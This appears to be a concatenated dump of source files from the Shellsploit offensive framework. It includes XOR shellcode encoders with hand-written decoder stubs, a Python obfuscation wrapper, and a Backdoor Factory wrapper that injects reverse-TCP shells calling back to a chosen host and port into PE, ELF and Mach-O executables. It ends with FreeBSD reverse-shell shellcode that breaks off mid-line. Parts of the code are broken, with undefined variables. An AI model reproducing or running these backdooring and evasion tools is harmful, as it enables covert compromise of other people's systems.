Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | 9 | from capstone import * 10 | from binascii import hexlify 11 | 12 | 13 | ARCH = { 14 | 'arm': CS_ARCH_ARM, 15 | 'arm64': CS_ARCH_ARM64, 16 | 'mips': CS_ARCH_MIPS, 17 | 'ppc': CS_ARCH_PPC, 18 | 'x86': CS_ARCH_X86, 19 | 'xcore': CS_ARCH_XCORE 20 | } 21 | 22 | MODE = { 23 | '16': CS_MODE_16, 24 | '32': CS_MODE_32, 25 | '64': CS_MODE_64, 26 | 'arm': CS_MODE_ARM, 27 | 'be': CS_MODE_BIG_ENDIAN, 28 | 'le': CS_MODE_LITTLE_ENDIAN, 29 | 'micro': CS_MODE_MICRO, 30 | 'thumb': CS_MODE_THUMB 31 | } 32 | 33 | test = [] -------------------------------------------------------------------------------- /shell/disassembly/dis.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | from capstoneheader import * 9 | 10 | 11 | def disas(shellcode, bits=32): 12 | if bits == 32: 13 | md = Cs(CS_ARCH_X86, CS_MODE_32) 14 | elif bits == 64: 15 | md = Cs(CS_ARCH_X86, CS_MODE_64) 16 | 17 | 18 | for i in md.disasm(shellcode, 0x00000): 19 | if len(hexlify(i.bytes)) > 6: 20 | db = "\t0x%x:\t%s\t%s %s" % (i.address, hexlify(i.bytes), i.mnemonic, i.op_str) 21 | else: 22 | db = "\t0x%x:\t%s\t\t%s %s" % (i.address, hexlify(i.bytes), i.mnemonic, i.op_str) 23 | test.append(db) 24 | return "\n"+"\n".join(test)+"\n" 25 | 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /shell/disassembly/dis2.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | from capstoneheader import * 9 | 10 | 11 | def disasNOTintel(shellcode, choice, bits=32): 12 | if choice == "arm": 13 | if bits == 64: 14 | md = Cs(CS_ARCH_ARM64, CS_MODE_ARM) 15 | else: 16 | md = Cs(CS_ARCH_ARM32, CS_MODE_ARM) 17 | else: 18 | #Must be test .. 19 | if bits == 64: 20 | md = Cs(CS_ARCH_MIPS, CS_MODE_64) 21 | else: 22 | md = Cs(CS_ARCH_MIPS, CS_MODE_32) 23 | 24 | 25 | for i in md.disasm(shellcode, 0x00000): 26 | if len(hexlify(i.bytes)) > 6: 27 | db = "\t0x%x:\t%s\t%s %s" % (i.address, hexlify(i.bytes), i.mnemonic, i.op_str) 28 | else: 29 | db = "\t0x%x:\t%s\t\t%s %s" % (i.address, hexlify(i.bytes), i.mnemonic, i.op_str) 30 | test.append(db) 31 | return "\n"+"\n".join(test)+"\n" 32 | 33 | -------------------------------------------------------------------------------- /shell/encoders/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/shell/encoders/__init__.py -------------------------------------------------------------------------------- /shell/encoders/py/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/shell/encoders/py/__init__.py -------------------------------------------------------------------------------- /shell/encoders/py/payloads.py: -------------------------------------------------------------------------------- 1 | class Encoders(object): 2 | def __init__(self): 3 | self.py = [ 4 | 'encoders/py/bzip2', 5 | "encoders/py/gzip", 6 | ] 7 | 8 | def ret(self): 9 | return len(self.py) -------------------------------------------------------------------------------- /shell/encoders/py/pyminifier/hero.py: -------------------------------------------------------------------------------- 1 | from optparse import OptionParser 2 | import sys 3 | from .opt import * 4 | 5 | from . import pyminify 6 | from . import __version__ 7 | 8 | """ 9 | -Lzma disable for a while.Coz pyminifer will be improve while merge to shellsploit.- 10 | 11 | py3 = False 12 | lzma = False 13 | if not isinstance(sys.version_info, tuple): 14 | if sys.version_info.major == 3: 15 | py3 = True 16 | try: 17 | import lzma 18 | except ImportError: 19 | pass 20 | else: 21 | import pylzma as lzma 22 | """ 23 | 24 | 25 | 26 | def main(**kwargs): 27 | options = Namespace(obf_functions=False, obf_import_methods=False, pyz=None, nominify=False, obf_classes=False, tabs=False, replacement_length= 1, bzip2=kwargs['bzip2'], destdir='./minified', prepend=None, obf_variables=False, outfile=None, obf_builtins=False, obfuscate=kwargs['obfuscate'], gzip=kwargs['gzip'], use_nonlatin=False) 28 | pyminify(options, kwargs['files']) 29 | 30 | 31 | -------------------------------------------------------------------------------- /shell/encoders/py/pyminifier/opt.py: -------------------------------------------------------------------------------- 1 | class Namespace(object): 2 | def __init__(self, **kwargs): 3 | self.__dict__.update(kwargs) -------------------------------------------------------------------------------- /shell/encoders/py/pyminifier/token_utils.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | __doc__ = """\ 4 | A couple of functions for dealing with tokens generated by the `tokenize` 5 | module. 6 | """ 7 | 8 | import tokenize 9 | try: 10 | import cStringIO as io 11 | except ImportError: # We're using Python 3 12 | import io 13 | 14 | def untokenize(tokens): 15 | """ 16 | Converts the output of tokenize.generate_tokens back into a human-readable 17 | string (that doesn't contain oddly-placed whitespace everywhere). 18 | 19 | .. note:: 20 | 21 | Unlike :meth:`tokenize.untokenize`, this function requires the 3rd and 22 | 4th items in each token tuple (though we can use lists *or* tuples). 23 | """ 24 | out = "" 25 | last_lineno = -1 26 | last_col = 0 27 | for tok in tokens: 28 | token_string = tok[1] 29 | start_line, start_col = tok[2] 30 | end_line, end_col = tok[3] 31 | # The following two conditionals preserve indentation: 32 | if start_line > last_lineno: 33 | last_col = 0 34 | if start_col > last_col and token_string != '\n': 35 | out += (" " * (start_col - last_col)) 36 | out += token_string 37 | last_col = end_col 38 | last_lineno = end_line 39 | return out 40 | 41 | def listified_tokenizer(source): 42 | """Tokenizes *source* and returns the tokens as a list of lists.""" 43 | io_obj = io.StringIO(source) 44 | return [list(a) for a in tokenize.generate_tokens(io_obj.readline)] 45 | -------------------------------------------------------------------------------- /shell/encoders/py/starter.py: -------------------------------------------------------------------------------- 1 | from .payloads import * 2 | 3 | 4 | 5 | def control( **kwargs): 6 | if kwargs['payload'] in Encoders().py: 7 | from .pyminifier import hero 8 | if kwargs['iteration']: 9 | for x in range(int(kwargs['iteration'])): 10 | if "bzip2" in kwargs['payload']: 11 | hero.main(obfuscate=True, bzip2=True, gzip=False ,files=kwargs['files']) 12 | elif "gzip" in kwargs['payload']: 13 | hero.main(obfuscate=True, bzip2=False, gzip=True ,files=kwargs['files']) 14 | else: 15 | if "bzip2" in kwargs['payload']: 16 | hero.main(obfuscate=True, bzip2=True, gzip=False ,files=kwargs['files']) 17 | elif "gzip" in kwargs['payload']: 18 | hero.main(obfuscate=True, bzip2=False, gzip=True ,files=kwargs['files']) -------------------------------------------------------------------------------- /shell/encoders/shellcode/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/shell/encoders/shellcode/__init__.py -------------------------------------------------------------------------------- /shell/encoders/shellcode/payloads.py: -------------------------------------------------------------------------------- 1 | class Encoders(object): 2 | def __init__(self): 3 | self.shellcode = [ 4 | "encoders/shellcode/intel/x86/xor86.py", 5 | "encoders/shellcode/intel/x86/xor_b3m.py", 6 | "encoders/shellcode/intel/x86/xor64.py", 7 | ] 8 | 9 | def ret(self): 10 | return len(self.shellcode) -------------------------------------------------------------------------------- /shell/encoders/shellcode/starter.py: -------------------------------------------------------------------------------- 1 | from .payloads import * 2 | 3 | 4 | 5 | def control( **kwargs): 6 | if kwargs['payload'] in Encoders().shellcode: 7 | data = open(kwargs['files'][0], "r").read().strip() 8 | 9 | if kwargs['payload'] == "encoders/shellcode/intel/x86/xor86.py": 10 | from .xor import prestart 11 | elif kwargs['payload'] == "encoders/shellcode/intel/x86/xor_b3m.py": 12 | from .xor_b3m import prestart 13 | 14 | 15 | 16 | with open(kwargs['files'][0], "w") as encoded: 17 | encoded.write(prestart((data.replace("\\x", "")), kwargs['iteration'])) 18 | 19 | -------------------------------------------------------------------------------- /shell/encoders/shellcode/xor.py: -------------------------------------------------------------------------------- 1 | from sys import setrecursionlimit 2 | from sys import version_info 3 | from re import findall 4 | from binascii import hexlify 5 | 6 | setrecursionlimit(9999) 7 | 8 | def xorme( data): 9 | from random import randint 10 | xor = [hex(x) for x in range(20,256)][randint(0, len([hex(x) for x in range(20,256)])-1)] 11 | shellcode = "" 12 | 13 | if version_info.major >= 3: 14 | for x in hexlify(data.encode('utf8')): 15 | y = x^int(xor, 16) 16 | shellcode += '0x%02x,' %y 17 | else: 18 | for x in bytearray(data.decode("hex")) : 19 | y = x^int(xor, 16) 20 | shellcode += '0x%02x,' %y 21 | 22 | 23 | padding = str(shellcode)+str(xor) 24 | shellcode = "EB095E8036" 25 | shellcode += str(xor).replace("0x", "") 26 | shellcode += "7408" 27 | shellcode += "46" 28 | shellcode += "EBF8" 29 | shellcode += "E8F2FFFFFF" 30 | shellcode += padding.replace("0x", "").replace(",", "") 31 | return shellcode 32 | 33 | 34 | def start( shellcode): 35 | try: 36 | control = True 37 | while control == True: 38 | qe = findall("..?", xorme( shellcode)) 39 | if "00" in qe: 40 | qe = findall("..?", xorme( shellcode)) 41 | control = True 42 | else: 43 | control = False 44 | return "".join(qe) 45 | except: 46 | print ("After roll 9999 times,payload generate failed.") 47 | 48 | 49 | def prestart( data, roll=None): 50 | if roll == None or roll == 1: 51 | data = start(data) 52 | elif roll > 50: 53 | return "Please do not use iteration more than 50 times ..." 54 | else: 55 | for x in range(int(roll)): 56 | data = start( data) 57 | 58 | qe = findall("..?", data) 59 | return "\\x"+"\\x".join(qe).lower() -------------------------------------------------------------------------------- /shell/encoders/shellcode/xor_b3m.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | from random import randint 9 | from itertools import product 10 | from sys import setrecursionlimit 11 | from re import findall 12 | from sys import exit 13 | from sys import version_info 14 | from binascii import hexlify 15 | 16 | 17 | setrecursionlimit(9999) 18 | def xorme( shellcode): 19 | cache = shellcode 20 | mylist = ["".join(x) for x in list(product("ABCDEF", repeat=2))] 21 | insert = mylist[randint(0,len(mylist)-1)] 22 | xorfirst = [ 23 | r"\x40", #inc eax 24 | r"\x43", #inc ebx 25 | r"\x42", #inc edx 26 | r"\x47", #inc edi 27 | ] 28 | header = xorfirst[randint(0, len(xorfirst)-1)] 29 | header += r"\xEB\x0D" 30 | header += xorfirst[randint(0, len(xorfirst)-1)] 31 | header += r"\x5E" 32 | header += xorfirst[randint(0, len(xorfirst)-1)] 33 | header += r"\x80\x36" 34 | header += r"\x"+insert 35 | header += r"\x74\x0A\x46" 36 | header += xorfirst[randint(0, len(xorfirst)-1)] 37 | header += r"\xEB\xF7" 38 | header += xorfirst[randint(0, len(xorfirst)-1)] 39 | header += r"\xE8\xEF\xFF\xFF\xFF" 40 | 41 | 42 | encode = "" 43 | if version_info.major >= 3: 44 | for x in hexlify(cache.encode('utf8')): 45 | y = x^int("0x"+insert, 16) 46 | test = r'\x%02x' % y 47 | encode += test 48 | else: 49 | for x in bytearray(cache.decode("hex")): 50 | y = x^int("0x"+insert, 16) 51 | test = r'\x%02x' % y 52 | encode += test 53 | 54 | header += encode.upper() 55 | header += r"\x"+insert 56 | 57 | if r"\x00" in header.lower(): 58 | xorme( shellcode) 59 | return header.lower().replace("\\x", "") 60 | 61 | 62 | 63 | 64 | def start( shellcode): 65 | try: 66 | control = True 67 | while control == True: 68 | qe = findall("..?", xorme( shellcode)) 69 | if "00" in qe: 70 | qe = findall("..?", xorme( shellcode)) 71 | control = True 72 | else: 73 | control = False 74 | return "".join(qe) 75 | except: 76 | return "After roll 9999 times,payload generate failed." 77 | #exit() 78 | 79 | 80 | 81 | def prestart( data, roll=None): 82 | cache = True 83 | if roll == None or roll == 1: 84 | data = start(data) 85 | cache = False 86 | elif roll > 25: 87 | return "This script is still BETA.Please do not use iteration more than 25 times." 88 | else: 89 | cache = False 90 | for x in range(int(roll)): 91 | if data == "After roll 9999 times,payload generate failed.": 92 | cache = True 93 | break 94 | data = start( data) 95 | 96 | if cache == False: 97 | qe = findall("..?", data) 98 | return "\\x"+"\\x".join(qe).lower() 99 | else: 100 | return "After roll 9999 times,payload generate failed." 101 | 102 | 103 | 104 | -------------------------------------------------------------------------------- /shell/inject/BFDBackdoors/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/shell/inject/BFDBackdoors/__init__.py -------------------------------------------------------------------------------- /shell/inject/BFDBackdoors/arm/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/shell/inject/BFDBackdoors/arm/__init__.py -------------------------------------------------------------------------------- /shell/inject/BFDBackdoors/backdoor.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | BackdoorFactory (BDF) v3 - FOUNTAINPATCH 4 | 5 | Many thanks to Ryan O'Neill --ryan 'at' codeslum org-- 6 | Without him, I would still be trying to do stupid things 7 | with the elf format. 8 | 9 | Also thanks to Silvio Cesare with his 1998 paper 10 | (http://vxheaven.org/lib/vsc01.html) which these ELF patching 11 | techniques are based on. 12 | 13 | Special thanks to Travis Morrow for poking holes in my ideas. 14 | 15 | Copyright (c) 2013-2015, Joshua Pitts 16 | All rights reserved. 17 | 18 | Redistribution and use in source and binary forms, with or without modification, 19 | are permitted provided that the following conditions are met: 20 | 21 | 1. Redistributions of source code must retain the above copyright notice, 22 | this list of conditions and the following disclaimer. 23 | 24 | 2. Redistributions in binary form must reproduce the above copyright notice, 25 | this list of conditions and the following disclaimer in the documentation 26 | and/or other materials provided with the distribution. 27 | 28 | 3. Neither the name of the copyright holder nor the names of its contributors 29 | may be used to endorse or promote products derived from this software without 30 | specific prior written permission. 31 | 32 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 33 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 34 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 35 | ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE 36 | LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 37 | CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 38 | SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 39 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 40 | CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 41 | ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 42 | POSSIBILITY OF SUCH DAMAGE. 43 | 44 | ''' 45 | 46 | from os.path import basename 47 | from os import getcwd 48 | from pebin import pebin 49 | from elfbin import elfbin 50 | from machobin import machobin 51 | 52 | 53 | 54 | 55 | 56 | class start(object): 57 | def __init__(self, choice, FILE, HOST, PORT): 58 | self.choice = choice 59 | self.FILE = FILE 60 | self.HOST = HOST 61 | self.PORT = PORT 62 | 63 | if self.basicDiscovery(self.FILE) != choice: 64 | self.conflict() 65 | 66 | 67 | @staticmethod 68 | def conflict(): 69 | return "Your file conflict with your choice." 70 | 71 | @staticmethod 72 | def basicDiscovery( FILE): 73 | macho_supported = ['\xcf\xfa\xed\xfe', '\xca\xfe\xba\xbe','\xce\xfa\xed\xfe'] 74 | testBinary = open(FILE, 'rb') 75 | header = testBinary.read(4) 76 | testBinary.close() 77 | if 'MZ' in header: 78 | return 'PE' 79 | elif 'ELF' in header: 80 | return 'ELF' 81 | elif header in macho_supported: 82 | return "MACHO" 83 | else: 84 | 'Only support ELF, PE, and MACH-O file formats' 85 | return None 86 | 87 | 88 | def patch(self): 89 | if self.choice is "PE": 90 | supported_file = pebin(self.FILE, #options.FILE 91 | None, #options.OUTPUT 92 | "reverse_shell_tcp_inline", #options.SHELL 93 | "sdata", #options.NSECTION 94 | 0, #options.DISK_OFFSET 95 | False, #options.ADD_SECTION 96 | False, #options.CAVE_JUMPING 97 | self.PORT, #options.PORT 98 | self.HOST, #options.HOST 99 | None, #options.SUPPLIED_SHELLCODE 100 | False, #options.INJECTOR 101 | True, #options.CHANGE_ACCESS 102 | False, #options.VERBOSE 103 | False, #options.SUPPORT_CHECK 104 | 380, #options.SHELL_LEN 105 | False, #options.FIND_CAVES 106 | ".old", #options.SUFFIX 107 | False, #options.DELETE_ORIGINAL 108 | False, #options.CAVE_MINER 109 | "ALL", #options.IMAGE_TYPE 110 | True, #options.ZERO_CERT 111 | False, #options.RUNAS_ADMIN 112 | True, #options.PATCH_DLL 113 | "automatic", #options.PATCH_METHOD 114 | None, #options.SUPPLIED_BINARY 115 | False, #options.XP_MODE 116 | False, #options.IDT_IN_CAVE 117 | False, #options.CODE_SIGN 118 | ) 119 | 120 | elif self.choice is "ELF": 121 | supported_file = elfbin(self.FILE, 122 | None, 123 | "REVERSESHELLNAME", 124 | self.HOST, 125 | self.PORT, 126 | False, 127 | False, 128 | options.SHELL_LEN, #I must learn this 129 | None, 130 | "ALL" 131 | ) 132 | 133 | elif self.choice is "MACHO": 134 | supported_file = machobin(self.FILE, 135 | None, 136 | "REVERSESHELLNAME", 137 | self.HOST, 138 | self.PORT, 139 | False, 140 | None, 141 | options.FAT_PRIORITY, #Special settings for macho files 142 | options.BEACON 143 | ) 144 | 145 | 146 | print ("\n\n") 147 | result = supported_file.run_this() 148 | print ("File {0} created !\n\n".format(supported_file.OUTPUT)) 149 | 150 | 151 | 152 | #start("PE", "Handle.exe", "192.168.1.34", 4444).patch() 153 | #start("ELF", "Handle.exe", "192.168.1.34", "4444").patch() 154 | #start("MACHO", "Handle.exe", "192.168.1.34", "4444").patch() -------------------------------------------------------------------------------- /shell/inject/BFDBackdoors/intel/FreeBSDIntelELF32.py: -------------------------------------------------------------------------------- 1 | ''' 2 | 3 | Copyright (c) 2013-2015, Joshua Pitts 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without modification, 7 | are permitted provided that the following conditions are met: 8 | 9 | 1. Redistributions of source code must retain the above copyright notice, 10 | this list of conditions and the following disclaimer. 11 | 12 | 2. Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | 3. Neither the name of the copyright holder nor the names of its contributors 17 | may be used to endorse or promote products derived from this software without 18 | specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 23 | ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE 24 | LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 25 | CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 26 | SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 27 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 28 | CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 29 | ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 30 | POSSIBILITY OF SUCH DAMAGE. 31 | 32 | ''' 33 | 34 | import struct 35 | 36 | 37 | class freebsd_elfI32_shellcode(): 38 | """ 39 | FreeBSDELF Intel x32 shellcode class 40 | """ 41 | 42 | def __init__(self, HOST, PORT, e_entry, SUPPLIED_SHELLCODE=None): 43 | #could take this out HOST/PORT and put into each shellcode function 44 | self.HOST = HOST 45 | self.PORT = PORT 46 | self.e_entry = e_entry 47 | self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE 48 | self.shellcode = "" 49 | 50 | def pack_ip_addresses(self): 51 | hostocts = [] 52 | if self.HOST is None: 53 | print "This shellcode requires a HOST parameter -H" 54 | return False 55 | for i, octet in enumerate(self.HOST.split('.')): 56 | hostocts.append(int(octet)) 57 | self.hostip = struct.pack('=BBBB', hostocts[0], hostocts[1], 58 | hostocts[2], hostocts[3]) 59 | return self.hostip 60 | 61 | def returnshellcode(self): 62 | return self.shellcode 63 | 64 | def reverse_shell_tcp(self, CavesPicked={}): 65 | """ 66 | Modified metasploit payload/bsd/x86/shell_reverse_tcp 67 | to correctly fork the shellcode payload and contiue normal execution. 68 | """ 69 | if self.PORT is None: 70 | print ("Must provide port") 71 | return False 72 | 73 | self.shellcode1 = "\x52" # push edx 74 | self.shellcode1 += "\x31\xC0" # xor eax, eax 75 | self.shellcode1 += "\xB0\x02" # mov al, 2 76 | self.shellcode1 += "\xCD\x80" # int 80 77 | self.shellcode1 += "\x5A" # pop edx 78 | self.shellcode1 += "\x85\xc0\x74\x07" 79 | self.shellcode1 += "\xbd" 80 | #JMP to e_entry 81 | self.shellcode1 += struct.pack("